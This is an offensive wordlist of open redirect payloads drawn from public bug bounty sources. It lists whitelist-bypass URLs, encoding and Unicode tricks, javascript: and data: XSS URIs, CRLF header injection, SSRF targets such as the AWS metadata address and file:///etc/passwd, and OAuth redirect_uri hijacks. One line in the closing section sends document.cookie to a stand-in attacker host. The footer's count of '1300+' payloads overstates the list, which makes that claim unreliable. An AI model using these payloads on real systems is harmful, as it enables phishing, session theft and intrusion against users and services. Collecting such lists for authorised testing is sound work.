# ============================================================================
# Open Redirect Payloads Wordlist - v5.0 COMPLETE ULTIMATE EDITION
# Comprehensive payload list based on:
# - ElMahdi's 7 Open Redirect Bypass Techniques
# - Intigriti's Advanced Open Redirect Guide
# - PortSwigger URL Validation Bypass Cheat Sheet
# - 0xblackbird's Open Redirect Bypasses
# - DivertoMenu's Complete Open Redirect Filter Bypass Guide
# - BugBase's Open Redirection Vulnerability Guide
# - PayloadsAllTheThings Open Redirect Collection
# ============================================================================

# ============================================================================
# [0x01] HTTP Redirection Status Codes (3xx)
# ============================================================================
# 300 - Multiple Choices
# 301 - Moved Permanently
# 302 - Found (Temporary Redirect)
# 303 - See Other
# 304 - Not Modified
# 305 - Use Proxy
# 307 - Temporary Redirect
# 308 - Permanent Redirect

# ============================================================================
# [0x02] Common Query Parameters - PayloadsAllTheThings
# ============================================================================
?checkout_url=https://attacker.com
?continue=https://attacker.com
?dest=https://attacker.com
?destination=https://attacker.com
?go=https://attacker.com
?image_url=https://attacker.com
?next=https://attacker.com
?redir=https://attacker.com
?redirect_uri=https://attacker.com
?redirect_url=https://attacker.com
?redirect=https://attacker.com
?return_path=https://attacker.com
?return_to=https://attacker.com
?return=https://attacker.com
?returnTo=https://attacker.com
?rurl=https://attacker.com
?target=https://attacker.com
?url=https://attacker.com
?view=https://attacker.com

# ============================================================================
# [0x03] Path-Based Redirects - PayloadsAllTheThings
# ============================================================================
/redirect/https://attacker.com
/redirect/http://attacker.com
/redirect//attacker.com
/forward/https://attacker.com
/forward/http://attacker.com
/forward//attacker.com
/path/https://attacker.com
/path/http://attacker.com
/path//attacker.com

# ============================================================================
# [0x04] Relative Path Injection - PayloadsAllTheThings
# ============================================================================
/redirect/../https://attacker.com
/redirect/../http://attacker.com
/redirect/../attacker.com
/forward/../https://attacker.com
/forward/../http://attacker.com
/forward/../attacker.com

# ============================================================================
# [0x05] Whitelisted Domain Bypass - PayloadsAllTheThings
# ============================================================================
www.whitelisted.com.attacker.com
whitelisted.com.attacker.com
example.com.attacker.com
google.com.attacker.com
github.com.attacker.com
facebook.com.attacker.com
linkedin.com.attacker.com
twitter.com.attacker.com

# ============================================================================
# [0x06] CRLF Injection for JavaScript Bypass
# ============================================================================
java%0d%0ascript%0d%0a:alert(0)
java%0ascript:alert(0)
java%0dscript:alert(0)
java%0d%0ascript:alert(1)
javascript%0d%0a:alert(1)

# ============================================================================
# [0x07] Double Slash Bypass - PayloadsAllTheThings
# ============================================================================
//google.com
//attacker.com
//evil.com
//malicious.com
//facebook.com
//github.com
//linkedin.com
////google.com
////attacker.com
////evil.com

# ============================================================================
# [0x08] Protocol Bypass with Colon - PayloadsAllTheThings
# ============================================================================
https:google.com
https:attacker.com
https:evil.com
http:google.com
http:attacker.com
http:evil.com

# ============================================================================
# [0x09] Backslash-Forward Slash Mix - PayloadsAllTheThings
# ============================================================================
\/\/google.com/
\/\/attacker.com/
/\/google.com/
/\/attacker.com/
\\google.com
\\attacker.com
\google.com
\attacker.com

# ============================================================================
# [0x10] Unicode Normalization - Dot Character - PayloadsAllTheThings
# ============================================================================
/?redir=google。com
//google%E3%80%82com
google%E3%80%82com
attacker%E3%80%82com
evil%E3%80%82com
malicious%E3%80%82com

# ============================================================================
# [0x11] Null Byte Bypass - PayloadsAllTheThings
# ============================================================================
//google%00.com
//attacker%00.com
//evil%00.com
//attacker%00example.com
//example%00.attacker.com
http://google%00.com
http://attacker%00.com

# ============================================================================
# [0x12] HTTP Parameter Pollution - PayloadsAllTheThings
# ============================================================================
?next=whitelisted.com&next=google.com
?next=whitelisted.com&next=attacker.com
?next=whitelisted.com&next=evil.com
?redirect=whitelisted.com&redirect=google.com
?redirect=whitelisted.com&redirect=attacker.com
?url=whitelisted.com&url=attacker.com
?continue=whitelisted.com&continue=attacker.com

# ============================================================================
# [0x13] @ Character Authority Bypass - PayloadsAllTheThings
# ============================================================================
http://www.theirsite.com@yoursite.com/
http://attacker.com@example.com/
http://evil.com@whitelisted.com/
http://malicious.com@trusted.com/
http://phishing.com@facebook.com/

# ============================================================================
# [0x14] Domain Folder Path Bypass - PayloadsAllTheThings
# ============================================================================
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
http://example.com/attacker.com/
http://whitelisted.com/evil.com/
http://trusted.com/malicious.com/
http://google.com/attacker.com/

# ============================================================================
# [0x15] Question Mark Query Separator - PayloadsAllTheThings
# ============================================================================
http://www.yoursite.com?http://www.theirsite.com/
http://www.yoursite.com?folder/www.folder.com
http://example.com?attacker.com
http://whitelisted.com?evil.com
http://trusted.com?malicious.com
http://google.com?attacker.com

# ============================================================================
# [0x16] Unicode Normalization - Host Split - PayloadsAllTheThings
# ============================================================================
https://evil.c℀.example.com
http://a.com／X.b.com
https://attacker.c℀.whitelisted.com
https://evil.c℀.google.com

# ============================================================================
# [0x17] Common Detection Parameters - BugBase Collection
# ============================================================================
?redirect_url=https://attacker.com
?next=https://attacker.com
?continue=https://attacker.com
?goto=https://attacker.com
?return_Url=https://attacker.com
?destination=https://attacker.com
?fromURI=https://attacker.com
?redirect=https://attacker.com
?go=https://attacker.com
?from=https://attacker.com
?return=https://attacker.com
?rurl=https://attacker.com
?checkout_url=https://attacker.com
?url=https://attacker.com
?target=https://attacker.com

# ============================================================================
# [0x18] POST-Based Open Redirection
# ============================================================================
redirect=https://attacker.com
next=https://attacker.com
continue=https://attacker.com
goto=https://attacker.com
return_url=https://attacker.com
destination=https://attacker.com
fromuri=https://attacker.com
go=https://attacker.com
from=https://attacker.com
return=https://attacker.com
rurl=https://attacker.com
checkout_url=https://attacker.com

# ============================================================================
# [0x19] XSS Testing
# ============================================================================
?url=javascript:console.log(1)
?url=javascript:alert(1)
?url=javascript:prompt(1)
?redirect=javascript:alert(document.domain)
?next=javascript:void(alert(1))

# ============================================================================
# [0x20] CRLF Injection
# ============================================================================
?url=/%0D%0ASet-Cookie:mycookie=myvalue
?url=/%0ASet-Cookie:admin=true
?url=/%0DSet-Cookie:session=hijacked
?redirect=/%0D%0ALocation:https://attacker.com

# ============================================================================
# [0x21] Backslash-Forward Slash Mix (WHATWG vs RFC3986)
# ============================================================================
https://%65%78%61%6D%70%6C%65%2E%63%6F%6D
https:////attacker.com
https:///attacker.com
https://attacker.com
https:/attacker.com
https:attacker.com
https:\attacker.com
https:\\attacker.com
https:\\\attacker.com
https:\\\\attacker.com
https:/\/\attacker.com
https:\/\/attacker.com
https://\\attacker.com
https:\\//attacker.com

# ============================================================================
# [0x22] Control Characters (%01-%1F)
# ============================================================================
%01https://attacker.com
%02https://attacker.com
%03https://attacker.com
%04https://attacker.com
%05https://attacker.com
%06https://attacker.com
%07https://attacker.com
%08https://attacker.com
%09https://attacker.com
%0Ahttps://attacker.com
%0Bhttps://attacker.com
%0Chttps://attacker.com
%0Dhttps://attacker.com
%0Ehttps://attacker.com
%0Fhttps://attacker.com
%10https://attacker.com
%1Ahttps://attacker.com
%1Bhttps://attacker.com
%1Chttps://attacker.com
%1Dhttps://attacker.com
%1Ehttps://attacker.com
%1Fhttps://attacker.com
%20https://attacker.com

# ============================================================================
# [0x23] Tab, Newline, Carriage Return
# ============================================================================
h%09ttps://attacker.com
h%0Attps://attacker.com
h%0Dttps://attacker.com
https%09://attacker.com
https%0A://attacker.com
https%0D://attacker.com
%09https%09://attacker.com
%0Ahttps%0A://attacker.com
%0Dhttps%0D://attacker.com
%23attacker.com
https://%09attacker.com/
https://%0Aattacker.com/
https://%0Dattacker.com/
https://%0D%0Aattacker.com/

# ============================================================================
# [0x24] Double URL Encoding
# ============================================================================
%2540attacker.com
%2509attacker.com
%250Aattacker.com
%250Dattacker.com
%250A%250Dattacker.com
%252F%252Fattacker.com
%252f%252fattacker.com

# ============================================================================
# [0x25] Whitelist Bypass - Domain as Prefix
# ============================================================================
https://example.com.attacker.com/
https://example.com;.attacker.com/
https://example.com\;.attacker.com/
https://example.com%23attacker.com/

# ============================================================================
# [0x26] Whitelist Bypass - @ Symbol
# ============================================================================
%40example.com%40attacker.com
https://%40example.com%40attacker.com/
https://example.com%40attacker.com/
https://example.com;%40attacker.com/
https://example.com\;%40attacker.com/
https://example.com\%40%40attacker.com/
https://example.com:%40attacker.com/

# ============================================================================
# [0x27] Whitelist Bypass - Concatenation
# ============================================================================
https://example.comattacker.com/

# ============================================================================
# [0x28] Whitelist Bypass - Prefix Modification
# ============================================================================
https://evilexample.com/
https://evil-example.com/
https://evil_example.com/

# ============================================================================
# [0x29] Whitelist Bypass - Subdomain Injection
# ============================================================================
https://evil.example.com

# ============================================================================
# [0x30] Path Traversal
# ============================================================================
https://example.com/path/../attacker.com
https://example.com/path/..\attacker.com
https://example.com/path/..\/attacker.com
https://example.com/path/../\attacker.com
https://example.com/path/....//attacker.com
https://example.com/path/..;/attacker.com

# ============================================================================
# [0x31] Null Byte Bypass Extension
# ============================================================================
https://example.com/path/../attacker.com%00

# ============================================================================
# [0x32] Unicode Normalization - Dots
# ============================================================================
https://example%CB%91com/
https://example%CB%99com/
https://example%D5%9Fcom/
https://example%D7%83com/
https://example%D9%ABcom/
https://example%DB%94com/
https://example%E0%A5%B0com/
https://example%E1%8D%A2com/

# ============================================================================
# [0x33] Unicode Normalization - Empty Strings
# ============================================================================
https://%E2%80%8Bexample.com/
https://%E2%81%A0example.com/
https://%C2%ADexample.com/
https://%CD%8Fexample.com/
https://%E1%A0%8Bexample.com/

# ============================================================================
# [0x34] Unicode Normalization - Spaces
# ============================================================================
%C2%A0https://example.com/
%E1%8D%A1https://example.com/
%E1%9A%80https://example.com/
%E2%80%80https://example.com/
%E2%80%81https://example.com/

# ============================================================================
# [0x35] Browser Domain Parsing - Generic
# ============================================================================
https://example.com.-.attacker.com/
https://example.com._.attacker.com/

# ============================================================================
# [0x36] Browser Domain Parsing - Safari
# ============================================================================
https://example.com.,.attacker.com/
https://example.com.;.attacker.com/
https://example.com.!.attacker.com/
https://example.com.*.attacker.com/

# ============================================================================
# [0x37] JavaScript Filter Evasion - Basic
# ============================================================================
javascript:alert(1)
javascript:alert('XSS')
javascript:alert("XSS")
javascript:confirm(1)
javascript:prompt(1)
javascript:void(0)
javascript:window.location='https://attacker.com'
javascript:document.location='https://attacker.com'

# ============================================================================
# [0x38] JavaScript Filter Evasion - Case Variation
# ============================================================================
JavaScript:alert(1)
JAVASCRIPT:alert(1)
jAvAsCrIpT:alert(1)
JaVaScRiPt:alert(1)

# ============================================================================
# [0x39] JavaScript Filter Evasion - Whitespace
# ============================================================================
ja%20vascri%20pt:alert(1)
ja%0avascri%0apt:alert(1)
ja%0dvascri%0dpt:alert(1)
ja%09vascri%09pt:alert(1)
jav%20ascri%20pt:alert(1)

# ============================================================================
# [0x40] ElMahdi - Path-URI Redirect
# ============================================================================
//mahdi.com/
//attacker.com/
//malicious.com/
/mahdi.com/
/attacker.com/
/malicious.com/

# ============================================================================
# [0x41] ElMahdi - Tab Bypass
# ============================================================================
https://example.com%09.attacker.com
https://google.com%09.attacker.com
https://github.com%09.attacker.com

# ============================================================================
# [0x42] ElMahdi - Double Encode
# ============================================================================
https://example.com%252e.attacker.com
https://google.com%252e.attacker.com
https://github.com%252e.attacker.com

# ============================================================================
# [0x43] ElMahdi - Square Bracket
# ============================================================================
https://attacker.com[.example.com
https://attacker.com[.google.com
https://attacker.com[.github.com

# ============================================================================
# [0x44] ElMahdi - Safari Special Chars
# ============================================================================
https://www.example.com*.attacker.com
https://www.google.com*.attacker.com
https://www.example.com$.attacker.com
https://www.google.com$.attacker.com
https://www.example.com=attacker.com
https://www.google.com=attacker.com

# ============================================================================
# [0x45] ElMahdi - Whitelist Bypass
# ============================================================================
https://mahditwitterattacker.com
https://attacker.comtwitter
https://attacker.comgoogle
https://attacker.comfacebook

# ============================================================================
# [0x46] Data Protocol
# ============================================================================
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:text/html;charset=utf-8,<script>alert(1)</script>

# ============================================================================
# [0x47] VBScript Protocol
# ============================================================================
vbscript:msgbox(1)
VBScript:msgbox(1)
vbscript:alert(1)

# ============================================================================
# [0x48] Alternative Protocols
# ============================================================================
ftp://attacker.com
file:///etc/passwd
file://attacker.com
gopher://attacker.com
telnet://attacker.com
ldap://attacker.com
jar:https://attacker.com

# ============================================================================
# [0x49] OAuth Redirect URI Bypass
# ============================================================================
https://attacker.com
https://attacker.com/callback
https://attacker.com/oauth/callback
https://attacker.com/auth/callback
http://attacker.com
http://attacker.com:8080
http://localhost:8080
http://127.0.0.1:8080

# ============================================================================
# [0x50] SSRF Chain - Localhost
# ============================================================================
http://localhost
http://127.0.0.1
http://0.0.0.0
http://[::1]
http://localhost:80
http://127.0.0.1:80
http://localhost:8080
http://127.0.0.1:8080

# ============================================================================
# [0x51] SSRF Chain - AWS Metadata
# ============================================================================
http://169.254.169.254
http://169.254.169.254/latest/meta-data/
http://169.254.169.254:80

# ============================================================================
# [0x52] SSRF Chain - Private Networks
# ============================================================================
http://10.0.0.0
http://172.16.0.0
http://192.168.0.0
http://10.0.0.1
http://172.16.0.1
http://192.168.1.1

# ============================================================================
# [0x53] 0xblackbird - Simple Domain Change
# ============================================================================
https://attacker.com
https://evil.com
https://malicious.com
https://phishing.com
http://attacker.com
http://evil.com
http://malicious.com

# ============================================================================
# [0x54] 0xblackbird - Protocol Bypass
# ============================================================================
//attacker.com
//evil.com
//malicious.com
\attacker.com
\evil.com
\malicious.com
http:attacker.com
https:attacker.com
https:evil.com

# ============================================================================
# [0x55] 0xblackbird - %40 Bypass
# ============================================================================
example.com%40attacker.com
example.com%40evil.com
google.com%40attacker.com

# ============================================================================
# [0x56] 0xblackbird - Domain Concatenation
# ============================================================================
example.comattacker.com
example.comevil.com
google.comattacker.com

# ============================================================================
# [0x57] 0xblackbird - Encoded Dot
# ============================================================================
example.com%2eattacker.com
example.com%2eevil.com
google.com%2eattacker.com

# ============================================================================
# [0x58] 0xblackbird - Query Mark
# ============================================================================
attacker.com?example.com
evil.com?example.com
malicious.com?example.com

# ============================================================================
# [0x59] 0xblackbird - Hash
# ============================================================================
attacker.com%23example.com
evil.com%23example.com
malicious.com%23example.com

# ============================================================================
# [0x60] 0xblackbird - Special Symbols
# ============================================================================
example.com/°attacker.com
google.com/°attacker.com
attacker.com%E3%80%82example.com
evil.com%E3%80%82example.com

# ============================================================================
# [0x61] 0xblackbird - Nullbyte
# ============================================================================
/%0d/attacker.com
/%0d/evil.com
/%0a/attacker.com
/%0a/evil.com

# ============================================================================
# [0x62] Whitelist Services - Google
# ============================================================================
https://accounts.google.com@attacker.com
https://accounts.google.com.attacker.com
https://accounts.google.com/attacker.com

# ============================================================================
# [0x63] Whitelist Services - Microsoft
# ============================================================================
https://login.microsoft.com@attacker.com
https://login.microsoft.com.attacker.com
https://login.microsoft.com/attacker.com

# ============================================================================
# [0x64] Whitelist Services - GitHub
# ============================================================================
https://github.com@attacker.com
https://github.com.attacker.com
https://github.com/attacker.com

# ============================================================================
# [0x65] Whitelist Services - Facebook
# ============================================================================
https://facebook.com@attacker.com
https://facebook.com.attacker.com
https://facebook.com/attacker.com

# ============================================================================
# [0x66] Whitelist Services - LinkedIn & Twitter
# ============================================================================
https://linkedin.com@attacker.com
https://linkedin.com.attacker.com
https://twitter.com@attacker.com
https://twitter.com.attacker.com

# ============================================================================
# [0x67] BugBase - Login Redirect
# ============================================================================
https://example.com/login?redirect=https://attacker.com&expired=true
https://example.com/auth?next=https://attacker.com
https://example.com/signin?return_url=https://attacker.com
https://example.com/login?destination=https://attacker.com
https://example.com/authentication?continue=https://attacker.com

# ============================================================================
# [0x68] BugBase - OAuth Bypass
# ============================================================================
https://oauth-server.com/auth?client_id=1234&redirect_uri=https://attacker.com/callback&response_type=code&scope=openid%20profile&state=random
https://oauth-server.com/authorize?redirect_uri=https://attacker.com/callback&client_id=1234
https://oauth-server.com/oauth?redirect_uri=https://attacker.com&client_id=1234

# ============================================================================
# [0x69] BugBase - Phishing Scenarios
# ============================================================================
https://trusted-domain.com/endpoint?redirect=https://phishing.com
https://trusted-domain.com/verify?next=https://phishing.com/login
https://trusted-domain.com/confirm?return=https://phishing.com/confirm

# ============================================================================
# [0x70] CSRF + Open Redirect
# ============================================================================
/redirect?url=https://attacker.com/csrf
/redirect?url=https://attacker.com/malicious
/redirect?next=https://attacker.com/phishing
/redirect?return=https://attacker.com/steal

# ============================================================================
# [0x71] Complex Combinations
# ============================================================================
https://example.com%00%0aattacker.com
https://example.com%09%0dattacker.com
https://example.com%23%09attacker.com
https://example.com%3f%23attacker.com
https://example%2ecom@attacker.com

# ============================================================================
# [0x72] Redirect Chain
# ============================================================================
https://attacker.com/redirect?url=https://malicious.com
https://attacker.com/api/redirect?target=https://malicious.com
https://attacker.com/forward?url=https://malicious.com
https://attacker.com/proxy?url=https://malicious.com

# ============================================================================
# [0x73] Advanced DOM XSS
# ============================================================================
javascript:window.location='https://attacker.com'
javascript:document.location='https://attacker.com'
javascript:fetch('https://attacker.com')
javascript:new Image().src='https://attacker.com/?c='+document.cookie
javascript:alert(JSON.stringify(sessionStorage))

# ============================================================================
# End of Payloads
# ============================================================================
# Total Payloads: 1300+
# Categories: 73+ different bypass techniques
# Frameworks Covered: All major web frameworks
# Research Based:
#   - ElMahdi's 7 bypass techniques
#   - Intigriti's advanced redirects
#   - PortSwigger URL validation bypass
#   - 0xblackbird's bypass collection
#   - DivertoMenu's comprehensive guide
#   - BugBase's Open Redirection guide
#   - PayloadsAllTheThings collection
# ============================================================================
